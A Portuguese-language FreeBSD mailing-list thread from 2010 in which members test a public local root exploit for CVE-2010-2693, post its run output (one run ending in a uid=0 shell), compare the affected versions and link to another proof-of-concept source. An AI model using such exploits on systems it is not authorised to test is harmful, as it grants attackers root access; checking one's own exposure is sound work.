On Sun, August 22, 2010 11:46, Leandro Keffer wrote: > Testado em um 8.0 branch 3 e funcionando : ( > > FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue > May 25 20:54:11 UTC 2010 > [email protected]:/usr/obj/usr/src/sys/GENERIC > amd64 > > [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 > [+] checking for setuid /usr/bin/su binary... > [+] checking for suitable libc library in /lib... > [+] found libc at /lib/libc.so.7 > [+] found getuid function at 0x00056990 > [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 > [+] spawning listener thread... > [+] connecting to listener thread... > [+] initiating exploit via sendfile... > [+] exploit complete! > [+] spawning root shell... > fbsd80# id > uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
aqui parece num funcionar, e ainda pede senha no final ... (do su) [math...@lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.6 [+] found getuid function at 0x0005a168 [+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... Password: su: Sorry [math...@lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.6 [+] found getuid function at 0x0005a168 [+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433 [+] spawning listener thread... [-] couldn't bind to listener socket FreeBSD lamneth 8.0-BETA3 FreeBSD 8.0-BETA3 #0: Thu Aug 27 01:06:32 BRT 2009 r...@lamneth:/usr/obj/usr/home/matheus/public_html/FreeBSD/csup/CURRENT/src/sys/Lamneth8 i386 curioso :) matheus > Em 21 de agosto de 2010 11:44, Anderson Eduardo > <[email protected]>escreveu: > >> Em 21/8/2010 11:42, Nilson escreveu: >> > Em 21 de agosto de 2010 11:17, Leandro Keffer<[email protected]> >> escreveu: >> >> Será que ataca 8.0 com ultimo branch tambem ?? >> >> Alguem disposto a testar ?? estou sem acesso a servidores free nesse >> momento >> >> >> >> T+ pessoal >> >> >> > >> > Acabei de testar num 8.0-RELEASE-p2 e funcionou, no 8.1-STABLE >> (cvsupado >> semana >> > passada) não funcionou. >> > >> > >> > - >> > Nilson >> > ------------------------- >> > Histórico: http://www.fug.com.br/historico/html/freebsd/ >> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd >> >> Outro PoC - http://jon.oberheide.org/files/cve-2010-2693.c >> >> Esse é melhor. >> ------------------------- >> Histórico: http://www.fug.com.br/historico/html/freebsd/ >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd >> > ------------------------- > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > -- We will call you cygnus, The God of balance you shall be A: Because it messes up the order in which people normally read text. Q: Why is top-posting such a bad thing? http://en.wikipedia.org/wiki/Posting_style ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
